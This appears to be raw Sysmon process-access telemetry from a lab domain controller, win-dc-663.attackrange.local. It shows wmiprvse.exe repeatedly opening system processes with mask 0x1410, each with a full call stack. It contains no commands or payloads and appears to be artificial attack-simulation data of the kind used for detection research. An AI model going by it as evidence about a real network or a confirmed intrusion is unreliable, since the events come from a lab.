21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2A00-00000000CF01}2920C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2700-00000000CF01}2896C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2500-00000000CF01}2788C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE7-60D3-2300-00000000CF01}2624C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE3-60D3-2200-00000000CF01}2548C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DE3-60D3-2100-00000000CF01}2540C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1F00-00000000CF01}2128C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1700-00000000CF01}1408C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1200-00000000CF01}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1000-00000000CF01}104C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0F00-00000000CF01}312C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0E00-00000000CF01}1004C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 